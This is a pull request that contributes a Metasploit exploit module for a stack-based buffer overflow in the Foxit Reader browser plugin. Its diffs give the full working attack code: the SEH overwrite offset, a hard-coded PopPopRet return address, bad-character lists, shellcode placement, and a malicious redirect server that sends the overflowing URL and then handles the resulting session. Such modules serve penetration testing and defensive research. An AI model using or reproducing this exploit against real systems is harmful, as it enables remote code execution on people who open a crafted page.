### PR TITLE
Adding Foxit Reader browser plugin exploit module

### DIFF
--- a/modules/exploits/windows/browser/foxit_reader_plugin_url_bof.rb
+++ b/modules/exploits/windows/browser/foxit_reader_plugin_url_bof.rb
@@ -59,12 +59,6 @@ class Metasploit3 < Msf::Exploit::Remote
 			'Privileged'     => false,
 			'DisclosureDate' => "Jan 7 2013",
 			'DefaultTarget'  => 0))
-
-		register_options(
-			[
-				Opt::LPORT(4444),
-				OptPort.new('SRVPORT', [ true, "The HTTP daemon port to listen on.", 8080 ])
-			], self.class)
 	end
 
 	def on_request_uri(cli, request)
@@ -80,12 +74,12 @@ class Metasploit3 < Msf::Exploit::Remote
 		# one for an HTTP 301 redirect and sending the payload
 		# and one for sending the HTTP 200 OK with appropriate Content-Type
 
-		if request.uri =~ /\.pdf/
+		if request.resource =~ /\.pdf$/
 			# sending Content-Typ
 			resp = create_response(200, "OK")
 			resp.body = ""
 			resp['Content-Type'] = 'application/pdf'
-			resp['Content-Length'] = 666
+			resp['Content-Length'] = rand_text_numeric(3,"0")
 			cli.send_response(resp)
 			return
 		else

--- a/modules/exploits/windows/browser/foxit_reader_plugin_url_bof.rb
+++ b/modules/exploits/windows/browser/foxit_reader_plugin_url_bof.rb
@@ -10,7 +10,6 @@ require 'msf/core'
 class Metasploit3 < Msf::Exploit::Remote
 
 	include Msf::Exploit::Remote::HttpServer::HTML
-	include Msf::Exploit::Remote::Seh
 
 	Rank = NormalRanking
 

--- a/modules/exploits/windows/browser/foxit_reader_plugin_url_bof.rb
+++ b/modules/exploits/windows/browser/foxit_reader_plugin_url_bof.rb
@@ -8,8 +8,9 @@
 require 'msf/core'
 
 class Metasploit3 < Msf::Exploit::Remote
-	
+
 	include Msf::Exploit::Remote::HttpServer::HTML
+	include Msf::Exploit::Remote::Seh
 
 	Rank = NormalRanking
 
@@ -17,14 +18,15 @@ class Metasploit3 < Msf::Exploit::Remote
 		super(update_info(info,
 			'Name'           => "Foxit Reader Plugin URL Processing Buffer Overflow",
 			'Description'    => %q{
-					This module exploits a vulnerability in the Foxit Reader Plugin npFoxitReaderPlugin.dll.
-					When loading PDF files from remote hosts, overly long query strings within URLs can cause a
-					stack-based buffer overflow, which can be exploited to execute arbitrary code. This exploit
-					has been tested on Windows XP SP3 (german) with Firefox xx.xx and Foxit Reader version 5.4.4.1128
+					This module exploits a vulnerability in the Foxit Reader Plugin
+					npFoxitReaderPlugin.dll. When loading PDF files from remote hosts, overly long
+					query strings within URLs can cause a stack-based buffer overflow, which can be
+					exploited to execute arbitrary code. This exploit has been tested on Windows XP
+					Home SP3 (german) with Firefox 18.0 and Foxit Reader version 5.4.4.1128
 					(npFoxitReaderPlugin.dll version 2.2.1.530).
 			},
 			'License'        => MSF_LICENSE,
-			'Author'         => 
+			'Author'         =>
 				[
 					'Andrea Micalizzi (rgod)', # initial discovery and poc
 					'Sven Krewitt <svnk[at]krewitt.org>' # metasploit module
@@ -37,8 +39,8 @@ class Metasploit3 < Msf::Exploit::Remote
 				],
 			'Payload'        =>
 				{
-					'Space'    => 790,
-					'BadChars' => "\x7d\x00\x23"
+					'Space'    => 790, # TODO: exactly calculate available space
+					'BadChars' => "\x7d\x00\x23\x25\x0a\x0d"
 				},
 			'DefaultOptions'  =>
 				{
@@ -47,7 +49,13 @@ class Metasploit3 < Msf::Exploit::Remote
 			'Platform'       => 'win',
 			'Targets'        =>
 				[
-					[ 'Automatic', {} ]
+					[ 'Windows XP Home SP3 (german)',
+						{
+							'Offset' 	=> 230,
+							'Ret' 		=> 0x0142318f 	# PopPopRet in
+														# npFoxitReaderPlugin.dll version 2.2.1.530
+						}
+					],
 				],
 			'Privileged'     => false,
 			'DisclosureDate' => "Jan 7 2013",
@@ -61,23 +69,20 @@ class Metasploit3 < Msf::Exploit::Remote
 	end
 
 	def on_request_uri(cli, request)
-
 		return if ((p = regenerate_payload(cli)) == nil)
 
-		sploit = "A" * 0xe1 			# TODO: modify to take request.uri.length into account and make random
-		sploit << "\xeb\x06\x90\x90" 	# jmp 6 bytes TODO: set via Target 
-		sploit << "\x8f\x31\x42\x01" 	# PopPopRet in npFoxitReaderPlugin.dll version 2.2.1.530
+		sploit = rand_text_alpha(target['Offset'] - request.resource.length)
+		sploit << Rex::Arch::X86.jmp_short(6) + make_nops(2)
+		sploit << [target.ret].pack('V')
+		sploit << make_nops(8) + p.encoded
+		sploit << rand_text_alpha(2300) # triggers access violation
 
-		# add payload and trigger exception TODO: further analysis of max. payload length
-		sploit << p.encoded + rand_text_alpha(1024 - sploit.length)
-				
-	
 		# we use two responses:
 		# one for an HTTP 301 redirect and sending the payload
 		# and one for sending the HTTP 200 OK with appropriate Content-Type
-		
+
 		if request.uri =~ /\.pdf/
-			# sending Content-Type
+			# sending Content-Typ
 			resp = create_response(200, "OK")
 			resp.body = ""
 			resp['Content-Type'] = 'application/pdf'
@@ -85,12 +90,11 @@ class Metasploit3 < Msf::Exploit::Remote
 			cli.send_response(resp)
 			return
 		else
-			print_status("Sending payload")
 			resp = create_response(301, "Moved Permanently")
 			resp.body = ""
-			resp['Location'] = request.uri + '/x.pdf?' + Rex::Text.uri_encode(sploit, 'hex-all')
+			resp['Location'] = request.uri + '.pdf?' + Rex::Text.uri_encode(sploit, 'hex-all')
 			cli.send_response(resp)
-			
+
 			# handle the payload
 			handler(cli)
 		end

--- a/modules/exploits/windows/browser/foxit_reader_plugin_url_bof.rb
+++ b/modules/exploits/windows/browser/foxit_reader_plugin_url_bof.rb
@@ -1,0 +1,99 @@
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# Framework web site for more information on licensing and terms of use.
+#   http://metasploit.com/framework/
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+	
+	include Msf::Exploit::Remote::HttpServer::HTML
+
+	Rank = NormalRanking
+
+	def initialize(info={})
+		super(update_info(info,
+			'Name'           => "Foxit Reader Plugin URL Processing Buffer Overflow",
+			'Description'    => %q{
+					This module exploits a vulnerability in the Foxit Reader Plugin npFoxitReaderPlugin.dll.
+					When loading PDF files from remote hosts, overly long query strings within URLs can cause a
+					stack-based buffer overflow, which can be exploited to execute arbitrary code. This exploit
+					has been tested on Windows XP SP3 (german) with Firefox xx.xx and Foxit Reader version 5.4.4.1128
+					(npFoxitReaderPlugin.dll version 2.2.1.530).
+			},
+			'License'        => MSF_LICENSE,
+			'Author'         => 
+				[
+					'Andrea Micalizzi (rgod)', # initial discovery and poc
+					'Sven Krewitt <svnk[at]krewitt.org>' # metasploit module
+				],
+			'References'     =>
+				[
+					[ 'URL', 'http://retrogod.altervista.org/9sg_foxit_overflow.htm' ],
+					[ 'URL', 'http://secunia.com/advisories/51733/' ],
+					[ 'OSVDB', '89030' ]
+				],
+			'Payload'        =>
+				{
+					'Space'    => 790,
+					'BadChars' => "\x7d\x00\x23"
+				},
+			'DefaultOptions'  =>
+				{
+					'EXITFUNC'         => "none",
+				},
+			'Platform'       => 'win',
+			'Targets'        =>
+				[
+					[ 'Automatic', {} ]
+				],
+			'Privileged'     => false,
+			'DisclosureDate' => "Jan 7 2013",
+			'DefaultTarget'  => 0))
+
+		register_options(
+			[
+				Opt::LPORT(4444),
+				OptPort.new('SRVPORT', [ true, "The HTTP daemon port to listen on.", 8080 ])
+			], self.class)
+	end
+
+	def on_request_uri(cli, request)
+
+		return if ((p = regenerate_payload(cli)) == nil)
+
+		sploit = "A" * 0xe1 			# TODO: modify to take request.uri.length into account and make random
+		sploit << "\xeb\x06\x90\x90" 	# jmp 6 bytes TODO: set via Target 
+		sploit << "\x8f\x31\x42\x01" 	# PopPopRet in npFoxitReaderPlugin.dll version 2.2.1.530
+
+		# add payload and trigger exception TODO: further analysis of max. payload length
+		sploit << p.encoded + rand_text_alpha(1024 - sploit.length)
+				
+	
+		# we use two responses:
+		# one for an HTTP 301 redirect and sending the payload
+		# and one for sending the HTTP 200 OK with appropriate Content-Type
+		
+		if request.uri =~ /\.pdf/
+			# sending Content-Type
+			resp = create_response(200, "OK")
+			resp.body = ""
+			resp['Content-Type'] = 'application/pdf'
+			resp['Content-Length'] = 666
+			cli.send_response(resp)
+			return
+		else
+			print_status("Sending payload")
+			resp = create_response(301, "Moved Permanently")
+			resp.body = ""
+			resp['Location'] = request.uri + '/x.pdf?' + Rex::Text.uri_encode(sploit, 'hex-all')
+			cli.send_response(resp)
+			
+			# handle the payload
+			handler(cli)
+		end
+	end
+
+end


### PR DESCRIPTION
Hi there,

here's an exploit module for the Foxit Reader browser plugin I'd like to contribute. It exploits a stack-based buffer overflow vulnerability within npFoxitReaderPlugin.dll.

Original discovery: Andrea Micalizzi (rgod)
http://retrogod.altervista.org/9sg_foxit_overflow.htm
